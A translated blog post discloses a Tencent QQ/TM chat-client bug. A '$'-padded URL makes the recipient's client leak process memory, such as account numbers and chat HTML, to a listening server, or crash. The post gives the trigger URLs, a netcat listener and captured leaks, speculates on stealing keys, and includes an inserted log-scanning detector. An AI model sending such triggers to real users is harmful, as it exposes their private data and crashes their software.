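Tencent QQ / TM remote memory read vulnerability, which can lead to remote overflow and denial-of-service attacks
Tencent QQ / TM chat window vulnerability: remote read of the other party's process memory, which can lead to remote overflow and denial-of-service attacks
Vulnerability description:
I don't really know how to define this one or what to call it, so let's go with this name for now...
This bug is pretty ridiculous, and I found it by sheer coincidence.
Some links on this site had been blocked by the great GFW, so in the morning I switched all the links over to a rather sleazy format...
For example: https://lcx.cc/?$=1910 (because of some compatibility problems, it has since been changed to something else...)
Then, in the afternoon, I posted a link in a group chat, and right away lots of people reported that QQ crashed or that the link could not be opened! See the screenshot below:
I got curious, checked it by hand, and found something strange, as shown below:
Clearly, the URL that got opened was completely wrong! And it had a string of strange characters tacked on the end...
That immediately piqued my interest, so I played with it for a while and came to the following conclusions...
Vulnerability testing:
Test environment: TM2009 Beta3.2 + IE9 + Windows 7 Ultimate 32-bit
In fact, the conclusion I reached later has nothing to do with the test environment; it is purely a data-handling problem inside the QQ and TM software. It can be triggered successfully on both QQ and TM, and some versions of QQ simply crash outright!!
Now for the test method. Tools to prepare: two penguins (QQ accounts), and NC or anything else that can act as a temporary web server...
Run: nc -l -p 80, you know the drill...
Then open two chat windows and send the following string from one of them: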
http://192.168.1.2/$0000
Then open that URL in the other chat window, the one that received it (in fact the URL can be opened from either side's window, and both will trigger the bug).
You will be amazed to find:
GET /root@lcx.cc%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive
The URL has somehow become: http://192.168.1.2/root@lcx.cc%3E, Holy, Shit!
What the heck is the trailing root@lcx.cc> ???? (I later worked out that this is the other party's QQ account...)
I don't get it yet. OK, on with the testing:
http://192.168.1.2/$1, which returned:
GET /para%E8%A3%9C%E2%88%A5 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive
And what is para%E8%A3%9C%E2%88%A5 supposed to be?? OK, next:
http://192.168.1.2/$000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Returned:
GET /7620ACE1-9C90-4E6A-9571-FE57A6A6DE69%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive
7620ACE1-9C90-4E6A-9571-FE57A6A6DE69>, Yoooooooooooooooooooooo~ What The Fuck!
Next:
http://192.168.1.2/$000
http://192.168.1.2/$=000
http://192.168.1.2/$=00
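Returned:
Oh ho ho ho, by the looks of it the penguin is now thoroughly confused inside. Let's keep going; I won't stop until it blows up, hahahaha...
http://192.168.1.2/$1111111100000000 returned: /link%3E, which URL-decodes to /link>. Doesn't that look a bit like an HTML tag? A hyperlink tag at that, it seems? Moving on...
http://192.168.1.2/$%E5%B1%8C%E7%82%B8%EF%BC%81, which returned:
platform:CF_Only_Open_Safe_URL, getting closer and closer to the truth, dear~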
http://192.168.1.2/$%01%02%03%04%04%05%06%07%08%08%08%08%08%08%08%08%08%08%08%08%08%08
GET /%DF%8FPYD%DF%8F/hL%DF%8F%E7%8C%80%E7%90%80T%DF%8F%E6%A0%80%E6%BC%80/%DF%8F%E4%8C%80%E7%94%80d%DF%8F%E6%A0%80%E6%A4%80l%DF%8F%E7%8C%80%E6%94%80t%DF%8F%E2%BC%80%EF%BF%BD%7C%DF%8F%0Cs%C2%84%DF%8FTi%C2%8C%DF%8F HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive
This time the penguin spurted out quite a big chunk. What is it? I'll explain later; let's keep abusing the penguin...
http://192.168.1.2/$0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Guess what came back? Look:
http://192.168.1.2/tr%20bkIndex=1%20bgColor=#fbfafa%20id=itemId_32%20onclick=SetCurSel(this)%20ondblclick%20='OnDbClickItem(this)'%20dCount=0><td><table%20cellspacing='0'%20cellpadding='0'><tr><td%20width='183'><object%20classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119'%20class=imgHead><param%20name='src'%20value='platformdata:Head\1.png'></object>306797777</td><td%20width='183'>306797777<td>2012/3/11%2010:47:52</td></tr></table></td></tr>
After URL decoding:
http://192.168.1.2/tr bkIndex=1 bgColor=#fbfafa id=itemId_32 onclick=SetCurSel(this) ondblclick ='OnDbClickItem(this)' dCount=0><td><table cellspacing='0' cellpadding='0'><tr><td width='183'><object classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119' class=imgHead><param name='src' value='platformdata:Head\1.png'></object>306797777</td><td width='183'>306797777<td>2012/3/11 10:47:52</td></tr></table></td></tr>
Hahahahaha, the raw HTML of the penguin's chat window!!! (The penguin's chat window is built on HTML.)
The penguin is about to blow. Continuing...
http://192.168.1.2/$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
http://192.168.1.2/$888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888880
Returned:
http://192.168.1.2/items%3E%3Citem%20title=%22一个月未登录%22%20tips=%22该分组中一个月未登录好友%22%20value=%2231%22%20/%3E%3Citem%20title=%22三个月未登录%22%20tips=%22该分组中三个月未登录好友%22%20value=%2291%22%20/%3E%3Citem%20title=%22半年未登录%22%20tips=%22该分组中半年未登录好友%22%20value=%22184%22%20/%3E%3C/items%3E???
After URL decoding:
items><item title="一个月未登录" tips="该分组中一个月未登录好友" value="31" /><item title="三个月未登录" tips="该分组中三个月未登录好友" value="91" /><item title="半年未登录" tips="该分组中半年未登录好友" value="184" /></items>???
Heh, what on earth is this data???
Returned data:
http://192.168.1.2//A%3E%3C/font%3E%3Cfont%20style=%22font-size:20pt;font-family:'微软雅黑','MS%20Sans%20Serif',sans-serif;%22%20color='800040'%3E%3Cbr%3E%3Cbr%3E打开该链接……%3C/font%3E
After URL decoding:
http://192.168.1.2//A></font><font style="font-size:20pt;font-family:'微软雅黑','MS Sans Serif',sans-serif;" color='800040'><br><br>打开该链接……</font>
Hahahaha, the HTML source of Tencent's "open link" dialog box...
Heh, and even more of a WTF: right after that, the penguin went bang in spectacular fashion, oh yeah...
After restarting QQ, I ran the 2048 bytes of the digit 8 again:
GET /Canvas%3E%3Cbackground%3E%3CTexture%20colorize=%22true%22%20file=%22com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png%22%20drawMode=%229Grid%22/%3E%3C/background%3E%3CTexture%20file=%22com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png%22%20Canvas.autoHeight=%22true%22%20Canvas.autoWidth=%22true%22%20Canvas.anchor=%22RIGHTCENTER%22%20Canvas.margin=%220,0,-5,-13%22/%3E%3C/Canvas%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive
/Canvas><background><Texture colorize="true" file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png" drawMode="9Grid"/></background><Texture file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png" Canvas.autoHeight="true" Canvas.autoWidth="true" Canvas.anchor="RIGHTCENTER" Canvas.margin="0,0,-5,-13"/></Canvas>
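Heh, Tencent has leaked memory...
I'll stop testing here; you can extrapolate, there is plenty more...
Cause of the vulnerability:
I'm no reverse-engineering guru, so the exact cause remains unknown...
But my guess is that when Tencent opens a URL there is a string-handling problem: when it hits the special character "$" (the dollar sign), a calculation goes wrong. Exactly how that happens, I cannot say at present.
The outcome, though, is known: the string length is miscalculated, so when the data is fetched the memory read is "misaligned", an unrelated block of memory is read out and assembled into a URL, and then the default browser is invoked to open it...
And so we get this painful bug. Because erroneous memory reads are dangerous, it crashes very easily...
And then you have a remote denial of service...
Unfortunately, the memory location this bug reads from does not seem to be controllable; in any case it is hard to pin down. Some strings, however, are read from fixed locations.
During testing, sometimes it was the other party's nickname or QQ number, sometimes chat history, sometimes the QQ number of someone in a group, and sometimes garbage (meaningless data from some memory location)...
In my tests, this seems to be the only special character that has the effect; other special characters all behave normally.
The symbol can be followed by any data at all, whatever you like; it is just padding that makes Tencent miscalculate. The bigger the better; digits seem to work best, and letters or other characters sometimes have no effect.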
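For anyone reviewing egress-proxy or web-server logs for this behaviour, the captured requests above share a recognisable shape: the request target decodes to the tail of a markup fragment (ending in ">") or to non-text bytes. The following Python sketch is an added example, not part of the original post; the function names and the three heuristics are assumptions, and the sample lines are request lines from the captures above plus two constructed ones.

```python
import re
from urllib.parse import unquote

MARKUP = re.compile(r"[<>]")                        # tail of an HTML/XML fragment
BINARY = re.compile(r"[\x00-\x1f\x7f-\x9f\ufffd]")  # control chars, U+FFFD
DOLLAR = re.compile(r"\$")                          # the trigger character
REQUEST_LINE = re.compile(r"[A-Z]+ (\S+) HTTP/\d\.\d")

# Request lines taken from the captures in this post, plus two constructed
# lines: a benign request and the test URL as an unaffected client sends it.
SAMPLE_LOG = [
    "GET /root@lcx.cc%3E HTTP/1.1",
    "GET /para%E8%A3%9C%E2%88%A5 HTTP/1.1",
    "GET /7620ACE1-9C90-4E6A-9571-FE57A6A6DE69%3E HTTP/1.1",
    "GET /link%3E HTTP/1.1",
    "GET /%DF%8F%0Cs%C2%84%DF%8FTi%C2%8C%DF%8F HTTP/1.1",  # tail of the long capture
    "GET /index.html HTTP/1.1",  # constructed, benign
    "GET /$0000 HTTP/1.1",       # constructed, URL passed through unchanged
]

def classify_path(target):
    """Return the reasons (possibly none) a request target looks suspicious."""
    decoded = unquote(target)  # invalid UTF-8 decodes to U+FFFD
    reasons = []
    if DOLLAR.search(target):
        reasons.append("dollar")
    if MARKUP.search(decoded):
        reasons.append("markup")
    if BINARY.search(decoded):
        reasons.append("binary")
    return reasons

def scan(log_lines):
    """Return (target, reasons) for every request line with at least one reason."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.fullmatch(line.strip())
        if m:
            reasons = classify_path(m.group(1))
            if reasons:
                hits.append((m.group(1), reasons))
    return hits

if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_LOG):
        print(",".join(reasons), target)
```

The /para%E8%A3%9C%E2%88%A5 capture produces no hit: a leak that happens to decode to ordinary text passes these heuristics, so they are a triage aid rather than a complete detector.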
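Exploitation:
You can remotely read the other party's process memory. All you need is to set up a simple web server that can listen on port 80; anything will do...
For now it can only read at random. I'm hoping for a reverse-engineering expert: if the read location can be controlled precisely, then reading keys out of the other party's memory is just around the corner, you know what I mean...
Also, this bug seems to be able to overwrite part of memory, so it may lead to a remote overflow...
That's it, Fuck Gov...
Submitted to WooYun: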
http://www.wooyun.org/bugs/wooyun-2010-05420/trace/af7f56ec622d95a4061760123db346ba
http://www.wooyun.org/bugs/wooyun-2012-05420